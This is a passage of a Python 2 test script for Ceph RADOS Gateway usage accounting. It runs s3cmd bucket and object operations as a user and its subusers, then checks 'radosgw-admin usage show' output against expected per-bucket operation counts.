                                     "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
                    os.chdir(ceph_path)
                    result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict10)
                    result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict11)
                    result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict12)
                    os.chdir(py_dir)
                    if result1 == result2 == result3 == True:
                        print "testcase5 %s" % (ok_display("OK"))
                    else:
                        print "testcase5 %s" % (fail_display("FAIL"))
                else:
                    print "testcase5 %s" % (fail_display("FAIL"))
            else:
                print "testcase5 %s" % (fail_display("FAIL"))
        else:
            print "testcase5 %s" % (fail_display("FAIL"))
class TestCase6(object):
    """Cross-bucket read attribution: each identity downloads objects from
    the buckets TestCase5 created (test2, test3); get_obj must be counted
    per bucket under the acting identity.  Relies on TestCase5's state."""
    def op1(self):
        """user1 downloads the object it stored in test3."""
        exec_command('s3cmd -c user1.s3cfg get s3://test3/subuser1.s3cfg 6-1.txt')
        # Wait for rgw to flush the usage log before the next verification.
        time.sleep(30)
    def op2(self):
        """subuser1 downloads one object each from test2 and test3."""
        exec_command('s3cmd -c subuser1.s3cfg get s3://test2/user1.s3cfg 6-2.txt')
        exec_command('s3cmd -c subuser1.s3cfg get s3://test3/subuser1.s3cfg 6-3.txt')
        time.sleep(30)
    def op3(self):
        """subuser2 downloads one object each from test2 and test3."""
        exec_command('s3cmd -c subuser2.s3cfg get s3://test2/user1.s3cfg 6-4.txt')
        exec_command('s3cmd -c subuser2.s3cfg get s3://test3/subuser1.s3cfg 6-5.txt')
        time.sleep(30)
    def run(self):
        """Execute op1..op3, verifying user/subuser usage after each step."""
        result1 = result2 = result3 = False
        self.op1()
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                  "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 1, "successful_ops": 1}}},
                                  "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 1, "successful_ops": 1},
                                                           "get_obj": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                           "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict3 = {"entries_size": 1,
                        "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
        os.chdir(py_dir)
        if result1 == result2 == result3 == True:
            self.op2()
            expect_dict4 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                      "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 1, "successful_ops": 1},
                                                               "get_obj": {"ops": 1, "successful_ops": 1}}},
                                      "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 1, "successful_ops": 1},
                                                               "get_obj": {"ops": 2, "successful_ops": 2}}}}}
            expect_dict5 = {"entries_size": 1,
                            "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                               "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                        "get_obj": {"ops": 1, "successful_ops": 1}}},
                                               "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict6 = {"entries_size": 1,
                            "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
            os.chdir(py_dir)
            if result1 == result2 == result3 == True:
                self.op3()
                expect_dict7 = {"entries_size": 1,
                                "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                          "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 1, "successful_ops": 1},
                                                                   "get_obj": {"ops": 2, "successful_ops": 2}}},
                                          "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 1, "successful_ops": 1},
                                                                   "get_obj": {"ops": 3, "successful_ops": 3}}}}}
                expect_dict8 = {"entries_size": 1,
                                "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 1, "successful_ops": 1}}},
                                                   "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
                expect_dict9 = {"entries_size": 1,
                                "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 1, "successful_ops": 1}}},
                                                   "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
                os.chdir(py_dir)
                if result1 == result2 == result3 == True:
                    print "testcase6 %s" % (ok_display("OK"))
                else:
                    print "testcase6 %s" % (fail_display("FAIL"))
            else:
                print "testcase6 %s" % (fail_display("FAIL"))
        else:
            print "testcase6 %s" % (fail_display("FAIL"))
class TestCase7(object):
    """Bucket-listing attribution: each identity lists buckets test1..test3;
    list_bucket must be counted per bucket under the acting identity while
    accumulating under user1.  Relies on state left by TestCase5/6."""
    def op1(self):
        """user1 lists all three buckets."""
        exec_command('s3cmd -c user1.s3cfg ls s3://test1')
        exec_command('s3cmd -c user1.s3cfg ls s3://test2')
        exec_command('s3cmd -c user1.s3cfg ls s3://test3')
        # Wait for rgw to flush the usage log before the next verification.
        time.sleep(30)
    def op2(self):
        """subuser1 lists all three buckets."""
        exec_command('s3cmd -c subuser1.s3cfg ls s3://test1')
        exec_command('s3cmd -c subuser1.s3cfg ls s3://test2')
        exec_command('s3cmd -c subuser1.s3cfg ls s3://test3')
        time.sleep(30)
    def op3(self):
        """subuser2 lists all three buckets."""
        exec_command('s3cmd -c subuser2.s3cfg ls s3://test1')
        exec_command('s3cmd -c subuser2.s3cfg ls s3://test2')
        exec_command('s3cmd -c subuser2.s3cfg ls s3://test3')
        time.sleep(30)
    def run(self):
        """Execute op1..op3, verifying user/subuser usage after each step."""
        result1 = result2 = result3 = False
        self.op1()
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                  "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 1, "successful_ops": 1},
                                                           "get_obj": {"ops": 2, "successful_ops": 2},
                                                           "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                  "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 1, "successful_ops": 1},
                                                           "get_obj": {"ops": 3, "successful_ops": 3},
                                                           "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                           "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                    "get_obj": {"ops": 1, "successful_ops": 1}}},
                                           "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict3 = {"entries_size": 1,
                        "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                    "get_obj": {"ops": 1, "successful_ops": 1}}},
                                           "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
        os.chdir(py_dir)
        if result1 == result2 == result3 == True:
            self.op2()
            expect_dict4 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "list_bucket": {"ops": 2, "successful_ops": 2}}},
                                      "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 1, "successful_ops": 1},
                                                               "get_obj": {"ops": 2, "successful_ops": 2},
                                                               "list_bucket": {"ops": 2, "successful_ops": 2}}},
                                      "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 1, "successful_ops": 1},
                                                               "get_obj": {"ops": 3, "successful_ops": 3},
                                                               "list_bucket": {"ops": 2, "successful_ops": 2}}}}}
            expect_dict5 = {"entries_size": 1,
                            "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                               "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                        "get_obj": {"ops": 1, "successful_ops": 1},
                                                                        "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                               "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                        "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict6 = {"entries_size": 1,
                            "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "get_obj": {"ops": 1, "successful_ops": 1}}},
                                               "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
            os.chdir(py_dir)
            if result1 == result2 == result3 == True:
                self.op3()
                expect_dict7 = {"entries_size": 1,
                                "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "list_bucket": {"ops": 3, "successful_ops": 3}}},
                                          "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 1, "successful_ops": 1},
                                                                   "get_obj": {"ops": 2, "successful_ops": 2},
                                                                   "list_bucket": {"ops": 3, "successful_ops": 3}}},
                                          "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 1, "successful_ops": 1},
                                                                   "get_obj": {"ops": 3, "successful_ops": 3},
                                                                   "list_bucket": {"ops": 3, "successful_ops": 3}}}}}
                expect_dict8 = {"entries_size": 1,
                                "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
                expect_dict9 = {"entries_size": 1,
                                "user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
                os.chdir(py_dir)
                if result1 == result2 == result3 == True:
                    print "testcase7 %s" % (ok_display("OK"))
                else:
                    print "testcase7 %s" % (fail_display("FAIL"))
            else:
                print "testcase7 %s" % (fail_display("FAIL"))
        else:
            print "testcase7 %s" % (fail_display("FAIL"))
class TestCase8(object):
    """Verify usage accounting of delete_obj / delete_bucket operations.

    Each op* method issues one s3cmd delete (object or bucket) as either the
    owner (user1) or one of its subusers; run() re-checks the per-user and
    per-subuser counters reported by `radosgw-admin usage show` after every
    step.  Relies on buckets test1..test3 populated by earlier test cases.
    """
    def op1(self):
        # Owner deletes an object from test3.
        exec_command('s3cmd -c user1.s3cfg del s3://test3/subuser1.s3cfg')
        # Usage log is flushed asynchronously; give rgw time to record it.
        time.sleep(30)
    def op2(self):
        # subuser1 deletes an object from test2.
        exec_command('s3cmd -c subuser1.s3cfg del s3://test2/user1.s3cfg')
        time.sleep(30)
    def op3(self):
        # subuser2 removes bucket test2.
        exec_command('s3cmd -c subuser2.s3cfg rb s3://test2')
        time.sleep(30)
    def op4(self):
        # subuser1 removes bucket test1.
        exec_command('s3cmd -c subuser1.s3cfg rb s3://test1')
        time.sleep(30)
    def op5(self):
        # Owner removes bucket test3.
        exec_command('s3cmd -c user1.s3cfg rb s3://test3')
        time.sleep(30)
    def run(self):
        """Execute op1..op5, verifying expected usage after each step.

        Prints "testcase8 OK" only if every verification level passes;
        the first failing level prints FAIL and skips the remaining ops.
        clean() runs unconditionally at the end.
        """
        result1 = result2 = result3 = False
        self.op1()
        # Expected counters after op1: test3 gains a delete_obj for user1.
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "list_bucket": {"ops": 3, "successful_ops": 3}}},
                                  "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 1, "successful_ops": 1},
                                                           "get_obj": {"ops": 2, "successful_ops": 2},
                                                           "list_bucket": {"ops": 3, "successful_ops": 3}}},
                                  "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 1, "successful_ops": 1},
                                                           "get_obj": {"ops": 3, "successful_ops": 3},
                                                           "list_bucket": {"ops": 3, "successful_ops": 3},
                                                           "delete_obj": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                    "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                           "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                    "get_obj": {"ops": 1, "successful_ops": 1},
                                                                    "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                           "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                    "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict3 = {"entries_size": 1,
                        "user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
                                           "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                    "get_obj": {"ops": 1, "successful_ops": 1},
                                                                    "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                           "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                    "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
        os.chdir(py_dir)
        if result1 == result2 == result3 == True:
            self.op2()
            # After op2: test2 gains a delete_obj for user1 and subuser1.
            expect_dict4 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "list_bucket": {"ops": 3, "successful_ops": 3}}},
                                      "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 1, "successful_ops": 1},
                                                               "get_obj": {"ops": 2, "successful_ops": 2},
                                                               "list_bucket": {"ops": 3, "successful_ops": 3},
                                                               "delete_obj": {"ops": 1, "successful_ops": 1}}},
                                      "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 1, "successful_ops": 1},
                                                               "get_obj": {"ops": 3, "successful_ops": 3},
                                                               "list_bucket": {"ops": 3, "successful_ops": 3},
                                                               "delete_obj": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict5 = {"entries_size": 1,
                            "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                               "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                        "get_obj": {"ops": 1, "successful_ops": 1},
                                                                        "list_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "delete_obj": {"ops": 1, "successful_ops": 1}}},
                                               "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                        "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict6 = {"entries_size": 1,
                            "user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
                                               "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "get_obj": {"ops": 1, "successful_ops": 1},
                                                                        "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                               "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                        "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
            os.chdir(py_dir)
            if result1 == result2 == result3 == True:
                self.op3()
                # After op3: test2 gains a delete_bucket for user1 and subuser2.
                expect_dict7 = {"entries_size": 1,
                                "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "list_bucket": {"ops": 3, "successful_ops": 3}}},
                                          "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 1, "successful_ops": 1},
                                                                   "get_obj": {"ops": 2, "successful_ops": 2},
                                                                   "list_bucket": {"ops": 3, "successful_ops": 3},
                                                                   "delete_obj": {"ops": 1, "successful_ops": 1},
                                                                   "delete_bucket": {"ops": 1, "successful_ops": 1}}},
                                          "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 1, "successful_ops": 1},
                                                                   "get_obj": {"ops": 3, "successful_ops": 3},
                                                                   "list_bucket": {"ops": 3, "successful_ops": 3},
                                                                   "delete_obj": {"ops": 1, "successful_ops": 1}}}}}
                expect_dict8 = {"entries_size": 1,
                                "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "delete_obj": {"ops": 1, "successful_ops": 1}}},
                                                   "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
                expect_dict9 = {"entries_size": 1,
                                "user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "delete_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
                os.chdir(py_dir)
                if result1 == result2 == result3 == True:
                    self.op4()
                    # After op4: test1 gains a delete_bucket for user1 and subuser1.
                    expect_dict10 = {"entries_size": 1,
                                     "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "list_bucket": {"ops": 3, "successful_ops": 3},
                                                                        "delete_bucket": {"ops": 1, "successful_ops": 1}}},
                                               "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "put_obj": {"ops": 1, "successful_ops": 1},
                                                                        "get_obj": {"ops": 2, "successful_ops": 2},
                                                                        "list_bucket": {"ops": 3, "successful_ops": 3},
                                                                        "delete_obj": {"ops": 1, "successful_ops": 1},
                                                                        "delete_bucket": {"ops": 1, "successful_ops": 1}}},
                                               "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "put_obj": {"ops": 1, "successful_ops": 1},
                                                                        "get_obj": {"ops": 3, "successful_ops": 3},
                                                                        "list_bucket": {"ops": 3, "successful_ops": 3},
                                                                        "delete_obj": {"ops": 1, "successful_ops": 1}}}}}
                    expect_dict11 = {"entries_size": 1,
                                     "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                                 "list_bucket": {"ops": 1, "successful_ops": 1},
                                                                                 "delete_bucket": {"ops": 1, "successful_ops": 1}}},
                                                        "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                                 "get_obj": {"ops": 1, "successful_ops": 1},
                                                                                 "list_bucket": {"ops": 1, "successful_ops": 1},
                                                                                 "delete_obj": {"ops": 1, "successful_ops": 1}}},
                                                        "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                                 "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
                    expect_dict12 = {"entries_size": 1,
                                     "user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
                                                        "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                                 "get_obj": {"ops": 1, "successful_ops": 1},
                                                                                 "list_bucket": {"ops": 1, "successful_ops": 1},
                                                                                 "delete_bucket": {"ops": 1, "successful_ops": 1}}},
                                                        "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                                 "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
                    os.chdir(ceph_path)
                    result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict10)
                    result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict11)
                    result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict12)
                    os.chdir(py_dir)
                    if result1 == result2 == result3 == True:
                        self.op5()
                        # After op5: test3 gains a delete_bucket for user1 only.
                        expect_dict13 = {"entries_size": 1,
                                         "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "list_bucket": {"ops": 3, "successful_ops": 3},
                                                                            "delete_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "put_obj": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 2, "successful_ops": 2},
                                                                            "list_bucket": {"ops": 3, "successful_ops": 3},
                                                                            "delete_obj": {"ops": 1, "successful_ops": 1},
                                                                            "delete_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "put_obj": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 3, "successful_ops": 3},
                                                                            "list_bucket": {"ops": 3, "successful_ops": 3},
                                                                            "delete_obj": {"ops": 1, "successful_ops": 1},
                                                                            "delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
                        expect_dict14 = {"entries_size": 1,
                                         "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                                     "list_bucket": {"ops": 1, "successful_ops": 1},
                                                                                     "delete_bucket": {"ops": 1, "successful_ops": 1}}},
                                                            "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                                     "get_obj": {"ops": 1, "successful_ops": 1},
                                                                                     "list_bucket": {"ops": 1, "successful_ops": 1},
                                                                                     "delete_obj": {"ops": 1, "successful_ops": 1}}},
                                                            "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                                     "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
                        expect_dict15 = {"entries_size": 1,
                                         "user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
                                                            "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                                     "get_obj": {"ops": 1, "successful_ops": 1},
                                                                                     "list_bucket": {"ops": 1, "successful_ops": 1},
                                                                                     "delete_bucket": {"ops": 1, "successful_ops": 1}}},
                                                            "test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
                                                                                     "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
                        os.chdir(ceph_path)
                        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
                        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
                        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict15)
                        os.chdir(py_dir)
                        if result1 == result2 == result3 == True:
                            print "testcase8 %s" % (ok_display("OK"))
                        else:
                            print "testcase8 %s" % (fail_display("FAIL"))
                    else:
                        print "testcase8 %s" % (fail_display("FAIL"))
                else:
                    print "testcase8 %s" % (fail_display("FAIL"))
            else:
                print "testcase8 %s" % (fail_display("FAIL"))
        else:
            print "testcase8 %s" % (fail_display("FAIL"))
        self.clean()
    def clean(self):
        """Trim user1's usage log, remove the user, and delete scratch files."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin usage trim --uid=user1')
        exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
        os.chdir(py_dir)
        exec_command('rm 6*.txt')
class TestCase9(object):
    """Verify usage accounting of create_bucket / put_obj operations.

    prepare() creates a fresh user1 plus subuser1; each op* performs one
    bucket-create or object-upload as either the owner or subuser1, and
    run() checks the reported usage counters after every step.
    """
    def prepare(self):
        # Create the test user and an S3 subuser with full access.
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
        os.chdir(py_dir)
    def op1(self):
        # Owner creates bucket test1.
        exec_command('s3cmd -c user1.s3cfg mb s3://test1')
        # Usage log is flushed asynchronously; give rgw time to record it.
        time.sleep(30)
    def op2(self):
        # subuser1 creates bucket test2.
        exec_command('s3cmd -c subuser1.s3cfg mb s3://test2')
        time.sleep(30)
    def op3(self):
        # Owner uploads an object into test2.
        exec_command('s3cmd -c user1.s3cfg put user1.s3cfg s3://test2')
        time.sleep(30)
    def op4(self):
        # subuser1 uploads an object into test1.
        exec_command('s3cmd -c subuser1.s3cfg put subuser1.s3cfg s3://test1')
        time.sleep(30)
    def op5(self):
        # subuser1 uploads a second object into test2.
        exec_command('s3cmd -c subuser1.s3cfg put subuser2.s3cfg s3://test2')
        time.sleep(30)
    def run(self):
        """Execute prepare then op1..op5, verifying usage after each step."""
        result1 = result2 = False
        self.prepare()
        self.op1()
        # op1 counts only for the owner; subuser1 has no activity yet.
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 0}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        os.chdir(py_dir)
        if result1 == result2 == True:
            self.op2()
            # A subuser create_bucket counts for both the owner and the subuser.
